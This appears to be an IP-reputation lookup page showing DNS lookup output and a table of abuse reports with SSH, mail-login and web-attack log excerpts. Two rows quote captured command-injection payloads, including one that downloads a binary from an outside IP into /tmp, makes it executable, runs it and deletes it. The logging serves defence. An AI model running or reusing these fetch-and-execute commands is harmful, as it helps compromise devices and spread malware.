City: unknown
Region: unknown
Country: Italy
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 93.53.85.14
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 12991
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;93.53.85.14. IN A
;; AUTHORITY SECTION:
. 344 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022011401 1800 900 604800 86400
;; Query time: 60 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Jan 15 03:59:16 CST 2022
;; MSG SIZE rcvd: 104
14.85.53.93.in-addr.arpa domain name pointer 93-53-85-14.ip122.fastwebnet.it.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
14.85.53.93.in-addr.arpa name = 93-53-85-14.ip122.fastwebnet.it.
Authoritative answers can be found from:
IP | Type | Details | Datetime |
---|---|---|---|
37.120.144.93 | attackspam | Fail2Ban Ban Triggered HTTP Exploit Attempt |
2020-06-11 12:25:12 |
95.216.20.54 | attackbotsspam | 20 attempts against mh-misbehave-ban on comet |
2020-06-11 12:23:58 |
168.232.198.218 | attackbots | Jun 11 06:18:04 piServer sshd[25799]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=168.232.198.218 Jun 11 06:18:05 piServer sshd[25799]: Failed password for invalid user admin from 168.232.198.218 port 57152 ssh2 Jun 11 06:22:20 piServer sshd[26260]: Failed password for root from 168.232.198.218 port 59528 ssh2 ... |
2020-06-11 12:37:00 |
46.38.150.190 | attackbots | Jun 11 05:59:43 mail postfix/smtpd\[32487\]: warning: unknown\[46.38.150.190\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6\ Jun 11 06:01:19 mail postfix/smtpd\[31556\]: warning: unknown\[46.38.150.190\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6\ Jun 11 06:31:42 mail postfix/smtpd\[1447\]: warning: unknown\[46.38.150.190\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6\ Jun 11 06:33:17 mail postfix/smtpd\[1598\]: warning: unknown\[46.38.150.190\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6\ |
2020-06-11 12:34:46 |
80.82.65.187 | attackbots | Jun 11 06:28:11 ns3042688 courier-pop3d: LOGIN FAILED, user=ventas@makita-dolmar.biz, ip=\[::ffff:80.82.65.187\] ... |
2020-06-11 12:41:04 |
106.51.85.66 | attackbots | Jun 11 03:51:56 rush sshd[30793]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.51.85.66 Jun 11 03:51:58 rush sshd[30793]: Failed password for invalid user michele from 106.51.85.66 port 59972 ssh2 Jun 11 03:58:38 rush sshd[30997]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.51.85.66 ... |
2020-06-11 12:30:21 |
185.91.142.202 | attackbots | Jun 11 06:31:21 ns381471 sshd[4708]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.91.142.202 Jun 11 06:31:23 ns381471 sshd[4708]: Failed password for invalid user cim from 185.91.142.202 port 58789 ssh2 |
2020-06-11 12:36:43 |
31.222.5.80 | attackspam | "Remote Command Execution: Unix Command Injection - Matched Data: ;chmod found within ARGS:remote_host: ;cd /tmp;wget h://152.44.44.68/d/xd.arm7;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm" |
2020-06-11 12:28:05 |
67.207.88.180 | attack | k+ssh-bruteforce |
2020-06-11 12:32:29 |
62.234.97.72 | attackspam | "aS.arm7;./Sa0aS.arm7;rm+-rf+Sa0aS.arm7%3b%23&remoteSubmit=Save" "POST /cgi-bin/ViewLog.asp HTTP/1.1" "-" "Sa0aS-owned-you" |
2020-06-11 12:43:09 |
61.191.55.33 | attack | Jun 11 05:54:24 hell sshd[28361]: Failed password for root from 61.191.55.33 port 50208 ssh2 ... |
2020-06-11 12:37:36 |
212.220.212.49 | attack | Jun 11 06:33:37 lnxweb62 sshd[30684]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212.220.212.49 Jun 11 06:33:37 lnxweb62 sshd[30684]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212.220.212.49 |
2020-06-11 13:02:14 |
183.11.69.93 | attackspambots | 2020-06-11T05:57:59.784857 X postfix/smtpd[714538]: NOQUEUE: reject: RCPT from unknown[183.11.69.93]: 450 4.1.8 |
2020-06-11 12:55:57 |
51.68.229.73 | attackbotsspam | Jun 11 06:56:54 home sshd[19441]: Failed password for root from 51.68.229.73 port 40098 ssh2 Jun 11 07:00:14 home sshd[19795]: Failed password for news from 51.68.229.73 port 41482 ssh2 ... |
2020-06-11 13:06:17 |
162.241.97.7 | attackspam | Jun 11 06:38:41 lnxmail61 sshd[7334]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.241.97.7 |
2020-06-11 12:59:40 |